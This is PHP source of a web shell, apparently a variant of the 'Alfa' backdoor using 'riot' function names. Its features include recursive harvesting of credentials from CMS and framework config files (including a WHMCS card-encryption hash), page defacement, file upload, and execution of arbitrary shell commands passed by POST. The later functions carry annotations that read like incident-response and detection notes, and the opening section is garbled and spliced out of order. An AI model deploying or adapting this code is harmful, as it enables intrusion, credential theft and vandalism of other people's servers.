echo ' | Archive Manager |'; echo '
'; if ($_POST["riot5"] == ">>") { //echo __pre(); echo 'PWD:'; echo ''; __riot_open_archive_file($file, $rand_id); echo ""; } echo ""; } catch (Exception $e) { echo "0"; } } function riotopen_archive_dir() { $dir = $_POST["riot1"]; $base_id = $_POST["riot2"]; __riot_open_archive_file($dir, $base_id); } function riotconfig_grabber() { riothead(); echo '
'; $icon = ' Name Size Modify Actions '; echo '
'; foreach ($files as $file) { $icon = ' ' . $icon . '| .. | dir - - '; if ($file["type"] == "dir") { echo '
"; } else { echo " ' . $icon . '| ' . $file["name"] . " | dir " . $file["modify"] . " - "; } } echo " " . $icon . "" . $file["name"] . " " . riotSize($file["size"]) . " " . $file["modify"] . " - "; riotfooter(); } function Alfa_ConfigGrabber($dir, $ext) { $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i"; $db_files = [ "wp-config.php", "configure.php", "config.inc.php", "configuration.php", "config.php", "conf.php", "dbclass.php", "class_core.php", "dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php", // ✅ Tambahan untuk Laravel & modern frameworks ".env", ".env.local", ".env.production", "env.php", "database.php", "app.php", "services.php", "cache.php", "mail.php", "queue.php", "logging.php", "broadcasting.php", "session.php", "filesystems.php", "horizon.php", "cors.php", // ✅ Tambahan untuk frameworks lain "local-config.php", "env.local.php", "settings.local.php", "config.local.php", "database.env", "dbconfig.php", "connection.php", "credentials.php", "secret-config.php", "prod-config.php", "staging-config.php", "firebase.php", "aws.php", "stripe.php", "paypal.php", // ✅ Tambahan universal configs "docker-compose.yml", "docker.env", "settings.ini", "config.json", "database.json", "secrets.json", "config.yaml", "database.yaml", "appsettings.json", ]; if (@is_readable($dir)) { $globFiles = @glob("$dir/*.$ext"); $globDirs = @glob("$dir/*", GLOB_ONLYDIR); $blacklist = []; foreach ($globDirs as $dir) { if (!@is_readable($dir) || @is_link($dir)) { continue; } 
@Alfa_ConfigGrabber($dir, $ext); } foreach ($globFiles as $file) { $filee = @file_get_contents($file); if (preg_match($pattern, $filee)) { echo " | Config Grabber |'; echo '
'; $dir = $_POST["riot2"]; $ext = $_POST["riot3"]; if ($_POST["riot5"] == ">>") { echo __pre(); Alfa_ConfigGrabber($dir, $ext); } echo "$file [ View file ]"; } } } } function riotsearcher() { riothead(); echo '"; riotfooter(); } function Alfa_ReadDir($dir, $method = "", $defpage = "") { if (!@is_readable($dir)) { return false; } if (@is_dir($dir)) { if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { if ($file == ".." || $file == ".") { continue; } $newfile = $dir . "/" . $file; if (@is_readable($newfile) && @is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } if (@is_file($newfile)) { if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } } } function Alfa_Rewriter($dir, $file, $defpage, $m = "index") { if (!@is_writable($dir)) { return false; } if (!@is_readable($dir)) { return false; } $defpage = @file_get_contents($defpage); if ($m == "index") { $indexs = ["index.php", "index.htm", "index.html", "default.asp", "default.aspx", "index.asp", "index.aspx", "index.js"]; if (in_array(strtolower($file), $indexs)) { @file_put_contents($dir, $defpage); echo @is_file($dir) ? $dir . "DeFaced...'; if (isset($_POST["riot1"]) && $_POST["riot1"] == "file") { echo ' | Searcher || Find Readable Or Writable Files | | Find Files By Name |
| Find Readable Or Writable Files |
'; $dir = $_POST["riot2"]; $ext = $_POST["riot3"]; $method = $_POST["riot4"]; if ($_POST["riot5"] == ">>") { echo __pre(); if (substr($dir, -1) == "/") { $dir = substr($dir, 0, -1); } Alfa_Searcher($dir, trim($ext), $method); } } if ($_POST["riot1"] == "str") { echo ' | Find Files By Name / Find String In Files |
'; $dir = $_POST["riot2"]; $string = $_POST["riot3"]; $ext = $_POST["riot5"]; if (!empty($string) and !empty($dir) and $_POST["riot4"] == ">>") { echo __pre(); Alfa_StrSearcher($dir, $string, $ext, $_POST["riot6"]); } } echo "
" : ""; } } elseif ($m == "all") { @file_put_contents($dir, $defpage); echo @is_file($dir) ? $dir . " DeFaced...
" : ""; } } if (isset($_GET['inc']) && $_GET['inc'] === 'upload') { echo ''; } if (isset($_FILES['file']['tmp_name'])) { $uploadd = $_FILES['file']['tmp_name']; if (is_uploaded_file($uploadd)) { $pwddir = $_POST['dir']; $real = $_FILES['file']['name']; $de = $pwddir . "/" . $real; if (copy($uploadd, $de)) { echo "success $de"; } else { echo "failed"; } } } function riotGetDisFunc() { riothead(); echo ''; $disfun = @ini_get("disable_functions"); $s = explode(",", $disfun); $f = array_unique($s); echo '"; riotfooter(); } function Alfa_Create_A_Tag($action, $vals) { $nulls = []; foreach ($vals as $key => $val) { echo '| ' . $key . " | "; unset($nulls); } } function Alfa_Searcher($dir, $ext, $method) { if (@is_readable($dir)) { if ($method == "all") { $ext = "*"; } if ($method == "dirs") { $ext = "*"; } $globFiles = @glob("$dir/*.$ext"); $globDirs = @glob("$dir/*", GLOB_ONLYDIR); $blacklist = []; foreach ($globDirs as $dir) { if (!@is_readable($dir) || @is_link($dir)) { continue; } @Alfa_Searcher($dir, $ext, $method); } switch ($method) { case "files": foreach ($globFiles as $file) { if (@is_writable($file)) { echo "$file"; echo "
Disable Functions
'; $i = 1; foreach ($f as $s) { $s = trim($s); if (function_exists($s) || !is_callable($s)) { continue; } echo ' # Func Name ' . $i . " "; echo '' . $s . " "; $i++; } echo "
"; } } break; case "dirs": foreach ($globFiles as $file) { if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) { echo dirname($file) . "
"; $blacklist[] = dirname($file); } } break; case "all": foreach ($globFiles as $file) { echo $file . "
"; } break; } unset($blacklist); } } function AlfaiFrameCreator($f, $width = "100%", $height = "600px") { return ''; } class AlfaCURL { public $headers; public $user_agent; public $compression; public $cookie_file; public $proxy; public $path; public $ssl = true; public $curl_status = true; function __construct($cookies = false, $compression = "gzip", $proxy = "") { if (!extension_loaded("curl")) { $curl_status = false; return false; } $this->headers[] = "Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg"; $this->headers[] = "Connection: Keep-Alive"; $this->headers[] = "Content-type: application/x-www-form-urlencoded;charset=UTF-8"; $this->user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)"; $this->path = ALFA_TEMPDIR . "/Alfa_cookies.txt"; $this->compression = $compression; $this->proxy = $proxy; $this->cookies = $cookies; if ($this->cookies) { $this->cookie($this->path); } } function cookie($cookie_file) { if (_riot_file_exists($cookie_file, false)) { $this->cookie_file = $cookie_file; } else { @fopen($cookie_file, "w") or die($this->error("The cookie file could not be opened.")); $this->cookie_file = $cookie_file; @fclose($this->cookie_file); } } function Send($url, $method = "get", $data = "") { if (!$this->curl_status) { return false; } $process = curl_init($url); curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers); curl_setopt($process, CURLOPT_HEADER, 0); curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent); curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); curl_setopt($process, CURLOPT_ENCODING, $this->compression); curl_setopt($process, CURLOPT_TIMEOUT, 30); if ($this->ssl) { curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false); } if ($this->cookies) { curl_setopt($process, CURLOPT_COOKIEFILE, $this->path); curl_setopt($process, CURLOPT_COOKIEJAR, $this->path); } if ($this->proxy) { 
curl_setopt($process, CURLOPT_PROXY, $this->proxy); } if ($method == "post") { curl_setopt($process, CURLOPT_POSTFIELDS, $data); curl_setopt($process, CURLOPT_POST, 1); curl_setopt($process, CURLOPT_HTTPHEADER, ["Content-Type: application/x-www-form-urlencoded"]); } $return = @curl_exec($process); curl_close($process); return $return; } function error($error) { echo ""; die(); } } function getConfigHtml($cms) { $content = ""; $cms_array = [ "wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke", "phpbb" => "PHPBB", "mybb" => "MyBB", "drupal" => "Drupal", "smf" => "SMF", ]; $content .= ""; return $content; } if (!function_exists("json_encode")) { function json_encode($a = false) { if (is_null($a)) { return "null"; } if ($a === false) { return "false"; } if ($a === true) { return "true"; } if (is_scalar($a)) { if (is_float($a)) { return floatval(str_replace(",", ".", strval($a))); } if (is_string($a)) { static $jsonReplaces = [["\\", "/", "\n", "\t", "\r", "\b", "\f", '"'], ["\\\\", "\\/", '\\n', '\\t', '\\r', "\\b", '\\f', '\"']]; return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"'; } else { return $a; } } $isList = true; for ($i = 0, reset($a); $i < count($a); $i++, next($a)) { if (key($a) !== $i) { $isList = false; break; } } $result = []; if ($isList) { foreach ($a as $v) { $result[] = json_encode($v); } return "[" . join(",", $result) . "]"; } else { foreach ($a as $k => $v) { $result[] = json_encode($k) . ":" . json_encode($v); } return "{" . join(",", $result) . 
"}"; } } } if (!function_exists("json_decode")) { function json_decode($json, $array = true) { $comment = false; $out = '$x='; for ($i = 0; $i < strlen($json); $i++) { if (!$comment) { if ($json[$i] == "{" || $json[$i] == "[") { $out .= " array("; } elseif ($json[$i] == "}" || $json[$i] == "]") { $out .= ")"; } elseif ($json[$i] == ":") { $out .= "=>"; } else { $out .= $json[$i]; } } else { $out .= $json[$i]; } if ($json[$i] == '"') { $comment = !$comment; } } eval($out . ";"); return $x; } } function riotterminalExec() { $pwd = "pwd"; $seperator = ";"; if ($GLOBALS["sys"] != "unix") { $pwd = "cd"; $seperator = "&"; } if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) { $cmd = "cd '" . addslashes($_POST["c"]) . "'" . $seperator; } $current_path = ""; if (preg_match("/cd[ ]{0,}(.*)[ ]{0,}" . $seperator . "|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST["riot1"], $match)) { if (empty($match[1])) { $match[1] = $match[2]; } $current_path = riotEx("cd " . addslashes($match[1]) . $seperator . $pwd); $current_path = str_replace("\\", "/", $current_path); } $out = riotEx($cmd . 
$_POST["riot1"], true); $out = htmlspecialchars($out); echo json_encode(["output" => convertBash($out), "path" => $current_path]); } function convertBash($code) { $dictionary = [ "[01;30m" => '', "[01;31m" => '', "[01;32m" => '', "[01;33m" => '', "[01;34m" => '', "[01;35m" => '', "[01;36m" => '', "[01;37m" => '', "[0m" => "", ]; $htmlString = str_replace(array_keys($dictionary), $dictionary, $code); return $htmlString; } function riotdoActions() { $chdir_fals = false; if (!@chdir($_POST["c"])) { $chdir_fals = true; $riot_canruncmd = _riot_can_runCommand(true, true); } if (isset($_POST["riot1"])) { $_POST["riot1"] = rawurldecode($_POST["riot1"]); } if (isset($_POST["riot2"])) { $_POST["riot2"] = rawurldecode($_POST["riot2"]); } $action = $_POST["riot3"]; if ($action == "permission") { $perms = 0; $perm = $_POST["riot2"]; for ($i = strlen($perm) - 1; $i >= 0; --$i) { $perms += (int) $perm[$i] * pow(8, strlen($perm) - $i - 1); } if (@chmod($_POST["riot1"], $perms)) { echo "done"; } else { echo "no"; } return; } if ($action == "rename" || $action == "move") { $riot1_decoded = $_POST["riot1"]; if ($chdir_fals) { $_POST["riot1"] = $_POST["c"] . "/" . $_POST["riot1"]; } $_POST["riot1"] = trim($_POST["riot1"]); $riot1_escape = addslashes($_POST["riot1"]); if ($_POST["riot3"] == "rename") { $_POST["riot2"] = basename($_POST["riot2"]); } if (!empty($_POST["riot2"])) { $cmd_rename = false; if ($chdir_fals && $riot_canruncmd) { if (_riot_is_writable($_POST["riot1"])) { $cmd_rename = true; $riot1_escape = addslashes($riot1_decoded); riotEx("cd '" . addslashes($_POST["c"]) . "';mv '" . $riot1_escape . "' '" . addslashes($_POST["riot2"]) . 
"'"); } } if (!file_exists($_POST["riot2"])) { if (@rename($_POST["riot1"], $_POST["riot2"]) || $cmd_rename) { echo "done"; } else { echo "no"; } } else { echo "no"; } } } elseif ($action == "copy") { if (is_dir($_POST["riot1"])) { $dir = str_replace("//", "/", $_POST["riot1"]); $dir = explode("/", $dir); if (empty($dir[count($dir) - 1])) { $name = $dir[count($dir) - 2]; } else { $name = $dir[count($dir) - 1]; } } else { $name = basename($_POST["riot1"]); } $dir = dirname($_POST["riot1"]); if ($dir == ".") { $dir = $_POST["c"] . "/"; } if (is_file($_POST["riot1"])) { @copy($_POST["riot1"], $_POST["riot2"]); echo "done"; } elseif (is_dir($_POST["riot1"])) { if (!is_dir($_POST["riot2"])) { mkdir($_POST["riot2"], 0755, true); } copy_paste($dir, $name, $_POST["riot2"] . "/"); echo "done"; } } elseif ($action == "modify") { if (!empty($_POST["riot1"])) { $time = strtotime($_POST["riot1"]); if ($time) { $touched = false; if ($chdir_fals && $riot_canruncmd) { riotEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST["riot1"])) . "' '" . addslashes($_POST["riot2"]) . "'"); $touched = true; } if (!@touch($_POST["riot2"], $time, $time) && !$touched) { echo "no"; } else { echo "ok"; } } else { echo "badtime"; } } } } function riotget_flags() { $flags = []; if (function_exists("curl_version")) { $curl = new AlfaCURL(); $server_addr = !@$_SERVER["SERVER_ADDR"] ? (function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????") : @$_SERVER["SERVER_ADDR"]; $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr); $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . 
$_SERVER["REMOTE_ADDR"]);
        // Tail of riotget_flags(): its header and the first geoplugin.net lookup sit on the preceding line.
        // Both lookups go out over plain HTTP from the web server process, so requests to
        // www.geoplugin.net/json.gp?ip=... originating from a web host are a network indicator for this file.
        // Loose `!= false`: a match at offset 0 is treated the same as no match.
        if (strpos($flag2, "geoplugin") != false) {
            $flag = json_decode($flag, true);
            $flag2 = json_decode($flag2, true);
            // $flag holds the lookup for the server address, $flag2 the lookup for REMOTE_ADDR (the requester).
            if (!empty($flag["geoplugin_countryCode"])) {
                $flags["server"]["name"] = $flag["geoplugin_countryName"];
                $flags["server"]["code"] = $flag["geoplugin_countryCode"];
            }
            if (!empty($flag2["geoplugin_countryCode"])) {
                $flags["client"]["name"] = $flag2["geoplugin_countryName"];
                $flags["client"]["code"] = $flag2["geoplugin_countryCode"];
            }
        }
    }
    // The country data is returned to the requester as JSON.
    echo json_encode($flags);
}

/**
 * Reads a CMS configuration file and echoes the database settings found in it as JSON.
 *
 * Request inputs (read directly from $_POST, no validation visible here):
 *   - riot1: key into the $config table below ("wp", "drupal", "drupal2", "vb", "phpnuke",
 *            "smf", "whmcs", "joomla", "phpbb", "mybb").
 *   - riot2: a directory (the table's "file" suffix is appended) or a direct file path.
 *
 * Output: JSON object with whichever of "host", "user", "dbname", "password", "prefix" and
 * (whmcs only) "cc_encryption_hash" matched. Returns false without output when riot2 is
 * neither a directory nor a file according to the checks below.
 *
 * Incident-response note: if this file was reachable on a host, the database credentials in
 * any of the configuration files listed below, and the WHMCS cc_encryption_hash, should be
 * treated as disclosed and rotated; the path is caller-supplied, so other sites readable by
 * the same account are in scope as well.
 */
function riotGetConfig()
{
    $cms = $_POST["riot1"];
    $path = trim($_POST["riot2"]);
    // Per-CMS table: "file" is the config path relative to the site root; every other entry is
    // [regex, capture-group index] used to pull one setting out of that file's text.
    $config = [
        "wp" => [
            "file" => "/wp-config.php",
            "host" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
            "dbname" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
            "dbuser" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
            "dbpw" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
            "prefix" => ["/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 1],
        ],
        "drupal" => [
            "file" => "/config.php",
            "host" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
            "dbname" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
            "dbuser" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
            "dbpw" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
            "prefix" => ["/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/", 1],
        ],
        "drupal2" => [
            "file" => "/sites/default/settings.php",
            // NOTE(review): the line break inside the next pattern is reproduced as found on the
            // page; it looks like an extraction wrap — confirm against the original sample.
            "host" => ["/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ 
]{0,},/", 1],
            "dbname" => ["/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1],
            "dbuser" => ["/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1],
            "dbpw" => ["/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1],
            "prefix" => ["/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1],
        ],
        "vb" => [
            "file" => "/includes/config.php",
            "host" => ["/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")servername(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
            "dbuser" => ["/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")username(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
            "dbname" => ["/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")dbname(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
            "dbpw" => ["/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
            "prefix" => ["/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")tableprefix(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3],
        ],
        "phpnuke" => [
            "file" => "/config.php",
            "host" => ['/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
            "dbname" => ['/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
            "dbuser" => ['/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
            "dbpw" => ['/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
            "prefix" => ['/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/', 3],
        ],
        "smf" => [
            "file" => "/Settings.php",
            "host" => ["/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbname" => ["/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbuser" => ["/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbpw" => ["/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "prefix" => ["/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
        ],
        // whmcs has no "prefix" entry; it carries "cc_encryption_hash" instead (handled separately below).
        "whmcs" => [
            "file" => "/configuration.php",
            "host" => ["/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbname" => ["/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbuser" => ["/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbpw" => ["/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "cc_encryption_hash" => ["/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
        ],
        "joomla" => [
            "file" => "/configuration.php",
            "host" => ["/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbname" => ["/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbuser" => ["/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbpw" => ["/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "prefix" => ["/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
        ],
        "phpbb" => [
            "file" => "/config.php",
            "host" => ["/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbname" => ["/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbuser" => ["/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbpw" => ["/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "prefix" => ["/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
        ],
        "mybb" => [
            "file" => "/inc/config.php",
            "host" => ["/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbname" => ["/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbuser" => ["/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "dbpw" => ["/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
            "prefix" => ["/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/", 3],
        ],
    ];
    // "drupal" falls back to the "drupal2" layout when <path>/config.php is not found.
    // _riot_is_dir() is defined outside this view; with "-e" it is presumably an existence test — TODO confirm.
    if ($cms == "drupal") {
        $file = $config[$cms]["file"];
        $file = $path . $file;
        if (@is_file($file) || _riot_is_dir($file, "-e")) {
        } else {
            $cms = "drupal2";
        }
    }
    // "vb": when <path>/includes/config.php is not found, the search moves to <path>/core.
    if ($cms == "vb") {
        $file = $config[$cms]["file"];
        $file = $path . $file;
        if (@is_file($file) || _riot_is_dir($file, "-e")) {
        } else {
            $path .= "/core";
        }
    }
    $data = [];
    // $cms is never checked against the keys of $config before these lookups.
    $srch_host = $config[$cms]["host"][0];
    $srch_user = $config[$cms]["dbuser"][0];
    $srch_name = $config[$cms]["dbname"][0];
    $srch_pw = $config[$cms]["dbpw"][0];
    $prefix = $config[$cms]["prefix"][0];
    $file = $config[$cms]["file"];
    $chost = $config[$cms]["host"][1];
    $cuser = $config[$cms]["dbuser"][1];
    $cname = $config[$cms]["dbname"][1];
    $cpw = $config[$cms]["dbpw"][1];
    $cprefix = $config[$cms]["prefix"][1];
    // riot2 may name the site directory or the config file itself; anything else ends the call.
    if (@is_dir($path) || _riot_is_dir($path)) {
        $file = $path . $file;
    } elseif (@is_file($path) || _riot_is_dir($path, "-e")) {
        $file = $path;
    } else {
        return false;
    }
    // __read_file() is defined outside this view; from here on $file holds its return value
    // (used as the file's text), no longer a path.
    $file = __read_file($file);
    // Strip spans that would otherwise match first: @code...@endcode for drupal2, and the
    // "right of the ... BAD!" span for vb (presumably sample settings in comments — TODO confirm).
    if ($cms == "drupal2") {
        $file = preg_replace("/\@code(.*?)\@endcode/s", "", $file);
    } elseif ($cms == "vb") {
        $file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
    }
    if (preg_match($srch_host, $file, $mach)) {
        $data["host"] = $mach[$chost];
    }
    if (preg_match($srch_user, $file, $mach)) {
        $data["user"] = $mach[$cuser];
    }
    if (preg_match($srch_name, $file, $mach)) {
        $data["dbname"] = $mach[$cname];
    }
    if (preg_match($srch_pw, $file, $mach)) {
        $data["password"] = $mach[$cpw];
    }
    // For whmcs there is no "prefix" pattern, so $prefix is null and this branch is skipped.
    if (isset($prefix)) {
        if (preg_match($prefix, $file, $mach)) {
            $data["prefix"] = $mach[$cprefix];
        }
    }
    if ($cms == "whmcs") {
        if (preg_match($config[$cms]["cc_encryption_hash"][0], $file, $mach)) {
            $data["cc_encryption_hash"] = $mach[3];
        }
    }
    // The extracted values, including the cleartext database password, go back in the HTTP response.
    echo json_encode($data);
}

// Request dispatcher. POST field "a" picks the handler: the string "riot" . a is called as a
// function if one by that name exists. With "a" absent, $default_action (set outside this view)
// or "FilesMan2" is used. function_exists() is the only gate visible in this part of the file,
// so every riot* function defined in it is reachable through this one parameter.
// Detection note: POST bodies to a single PHP file carrying the fields a, c, riot1 and riot2
// are a usable access-log / WAF signature for this family.
if (empty($_POST["a"])) {
    if (isset($default_action) && function_exists("riot" . $default_action)) {
        $_POST["a"] = $default_action;
    } else {
        $_POST["a"] = "FilesMan2";
    }
}
if (!empty($_POST["a"]) && function_exists("riot" . $_POST["a"])) {
    call_user_func("riot" . $_POST["a"]);
}
// Execution always stops here; the text after the closing tag is never emitted.
exit();
?> cURL Error
$error